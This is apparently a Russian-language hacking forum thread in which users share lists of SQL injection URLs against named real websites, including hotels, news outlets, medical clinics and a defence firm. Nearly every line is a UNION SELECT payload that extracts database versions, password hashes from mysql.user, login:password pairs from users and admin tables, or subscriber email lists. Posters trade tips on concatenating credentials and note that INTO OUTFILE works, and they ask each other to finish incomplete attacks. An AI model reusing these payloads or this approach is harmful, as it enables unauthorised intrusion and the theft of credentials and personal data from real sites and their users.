SQL Инъекции

http://www.travellatvia.lv/8/90/0/ru/?main=5&reg=1'

 

через раз отвечало мне internal error, так что не доделал:

чего-то колонки в Customers не вытянул

 

=\

 

Моя первая скуль...
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-9%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&mode=chrono&order=0

P.S. Если кто-нибудь доведет её до ума, я буду благодарен...

 

http://www.italyhotel.ru/index.php?d=stadt&id=-29+union+select+1,2,3,4,5,6,7,8,9,password,11,user+from+mysql.user/*

 

http://www.multidmedia.com/news/news.php?id=-62+union+select+1,2,VERSION(),4,5/*

http://www.trud.ru/issue/news.php?id=-2215+union+select+1,2,5,4,5,6,7/*

http://www.almaz-antey.ru/news.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+users/*

http://www.whenhamstersattack.com/news.php?id=-4+union+select+1,2,3,4,5,6,7/*

http://www.mostrud.ru/news.php?id=-48+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user/*

http://www.footballfoundation.com/news.php?id=-581+union+select+1,2,3,4,5,6,7+from+mysql.user/*

http://www.gamersinfo.net/content/news.php?id=-168+union+select+1,2,3,4,5,6,7,8,9+from+user/*

http://fishres.ru/news/news.php?id=-4471+union+select+1,2,3,4,5,6,7,8,9/*

http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*

http://www.akdgs.ru/news.php?id=-49+union+select+1,2,3,4,5,6/*

http://www.marchespublics.net/actualite/news.php?id=-635+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

http://www.filmdeculte.com/news/news.php?id=-3094+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.tabdc.org/news.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

http://www.abajour.ru/news.php?id=-19+union+select+1,2,3,4,5/*

http://www.liverpoolfc.ru/news.php?id=-859+union+select+1,2,3,4,5,6+from+users/*

 

http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+from+mysql.user/*

Into Outfile можно применить!

 

__http://www.glimm-med.de/clinics.php?id=-1+union+select+1,id,3,4,login,password,7,8,9,10+from+users/*

__http://www.medsys.ru/index.phtml?mm=quest&sm=faq&ctype=15&cdir=-1+union+select+1,2,3,4,5/*

__http://www.androlog.ru/?module=publications&id=-1+union+select+1,user(),3,4,5/*

 

Юзай concat(user,char(58),password)
или вместо char(58) ставь 0x3a. Это всего навсего ":" , но так удобнее

 

Code:

http://www.tectonic.co.za/view.php?id=-1+union+select+concat(username,0x3a,password),2+from+users/*

в title

Code:

http://www.mp3search.by/artist.php?id=-1+union+select+1,concat(login,0x3a,password)+from+admin/*

байан делетед

 

первая скула , подбор столбцов не получился ,если кто сможет что нить сделать ,пишите ,90% что стоит префикс у бд.
http://www.green-pik.ru/user_profile.php?id=-7838%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

 

__http://www.tvmed.ru/?module=custompage&id=-1+union+select+1,2,user(),4,5,database(),7,8,9,10/*

__http://www.smdoctors.ru/razdel.php?R=-1+union+select+1,user(),3,4,5,6,7,8,9/*

__http://www.lakident.ru/index.php?id=-1+union+select+1,database(),user(),4/*

 

Code:

http://www.php.com/include/events/eventdetail.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*

=)

 

Моя первая:

Code:

http://www.rakurs.rovno.ua/info.php?id=-2879%20union%20select%201,2,3,4,5,6,7,8,9,s.*%20from%20subscribers%20s%20limit%201,1/*
http://www.rakurs.rovno.ua/info.php?id=-2879%20union%20select%201,2,3,s.*,11%20from%20customer%20s%20limit%204,1/*

 

Здесь вытянул таблицу с мейлами, тех кто подписался на рассылку:

__http://www.do-posle.ru/new_diz/show.php?id=-1+union+select+1,id,3,4,mail,6,7+from+mail/*

Здесь ничего особенного:

__http://www.psychiatry.ru/library/lib/article.php4?booknumber=6&article_id=-1+union+select+1,2,3,4,5,6/*

 

http://www.ifbikes.com/news.php?id=-76+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.russianrugby.ru/news.php?Id=-697+union+select+1,2,3,4,5,6/*

http://www.healthsentinel.com/news.php?event=news_print_list_item&id=-1732+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.reusablebags.com/news.php?id=-17+union+select+1,VERSION(),3,4,5,6,7,8,9/*

http://www.sakhalin.environment.ru/news.php?id=-37+union+select+1,2,3,4,5/*

http://www.ihrc.org.uk/show.php?id=-1740+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.foxreality.com/show.php?id=-4373+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+INFORMATION_SCHEMA.TABLES/*

http://www.rusbiotech.ru/novice/show.php?id=-1832+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*

http://www.radioguerrilla.ro/show.php?id=-21+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11/*

 

http://www.shanson.info/mp3/view_cat2.php?id=-6+union+select+1,2,concat(user(),char(58),database(),char(58),version())/*
с таблицами беда.

 

__http://www.atletika.ru/otdel.php?otdel=-1+union+select+1,concat(name,char(58),pass),3,4,5,6,7,8,9,10,11,12,13+from+user/*

__http://www.nmsmoscow.ru/index.php?r=3&s=-1+union+select+1,2,user(),4/*

__http://www.a2dent.ru/index.php?page=-1+union+select+1,user(),database(),4,5,6,7,8,9,10/*

 

___

 

мой небольшой улов =)